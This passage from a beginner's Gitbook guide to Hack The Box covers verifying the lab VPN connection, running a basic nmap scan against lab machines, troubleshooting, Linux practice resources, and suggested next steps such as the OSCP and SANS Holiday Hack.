![](.gitbook/assets/image%20%2861%29.png) 96 | 97 | * Leave the terminal window open, as this is what keeps the VPN connection alive. If you close it, your VPN connection will be shut down and you will lose access to the lab until you reconnect. 98 | * To verify, open a new terminal and type `ip addr`. You should see a `tun0` or `tap0` interface with an IP address in the 10.10.X.X/23 range. See number 3 in the screenshot below. If you don't have such an interface, something is not right. 99 | 100 | ![](.gitbook/assets/image%20%284%29.png) 101 | 102 | * Verify in the Access panel that the IP address is the same as in the "inet" of the tun0 interface. 103 | * Try to scan a box using `nmap ` of one of the IP addresses under "Active" machines. 104 | * Poke around the HTB web interface to learn how the platform works. 105 | 106 | ### 7 **- Verify that things work** 107 | 108 | Check that the following works: 109 | 110 | * Kali Linux is running as a VM 111 | * The VM survives a reboot 112 | * Kali can be put in fullscreen 113 | * Copypaste between Kali and the host OS works 114 | * VPN to HTB is connected and working 115 | 116 | **Troubleshooting** 117 | 118 | * Reboot 119 | * In the Access panel on HTB, press Regenerate to reset the VPN connection and download a new VPN pack. 120 | * Try reconnecting with `openvpn` as in step 6 of this article. 121 | 122 | ### 8 - Practice the Linux terminal 123 | 124 | The site [Linux Journey](https://linuxjourney.com/) provides a fine introduction to Linux. We recommend doing the following modules, but if you decide to do more that is of course fantastic. 125 | 126 | * [Getting Started](https://linuxjourney.com/lesson/linux-history) 127 | * [Command Line](https://linuxjourney.com/lesson/the-shell) 128 | * [Text-fu](https://linuxjourney.com/lesson/stdout-standard-out-redirect) \(optional, but incredibly useful\) 129 | 130 | Unless you are already a Linux sysadmin and these things are absolutely clear to you, I recommend doing at least the Command Line module. It allows you to become familiar with basic navigation in the terminal. Test all the commands in the terminal in Kali Linux. **Being able to use Linux and the terminal efficiently is the alpha and omega of hacking.** 131 | 132 | -------------------------------------------------------------------------------- /what-now.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Outlining what could be the next steps in your hacker carreer 3 | --- 4 | 5 | # What now? 6 | 7 | * Keep working on boxes on HTB 8 | * Read writeups of machines and [Ippsec videos](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) to learn how others solved boxes you have rooted 9 | * Spread your knowledge by teaching others what you have learned and maybe even make some short writeups of boxes 10 | * Read some books on hacking subjects that interest you 11 | * **More advanced labs on HTB** - Endgame \(requires guru rank\), Rastalabs \(paid\), Offshore \(paid\) 12 | * **Offensive Security Certified Professional \(OSCP\)** certification 13 | * 55 machines with 30/60/90 day lab access 24 hour exam. 14 | * HTB is harder than OSCP 15 | * **SANS Holiday Hack 2018** 16 | * Starts december 2018 17 | * 8-bit mini game 18 | * Super cool CTF challenges 19 | * Hacking boxes 20 | * Saving Santa Clause 21 | 22 | Microsoft hacking is extremely fun and useful to get into. Especially if you want to venture past hacking individual boxes. Check out chryzsh' other Gitbook called [Darth Sidious](https://hunter2.gitbook.io/darthsidious/), dedicated to Windows hacking. 23 | 24 | 25 | 26 | ![](https://lh3.googleusercontent.com/4D-jyn-zfGy01nL5pL5yEIq2pA-p0ZTdjvSBasc5KjNHQZFGufCut_k3hJxjbsdWP6UHbECKESnLexmN_RkpXQh7FkPyT1xhHP4EgWTd6K1GZsvozQHpuUtaiUKaXdLM4sxbXk41Ddc) 27 | 28 | --------------------------------------------------------------------------------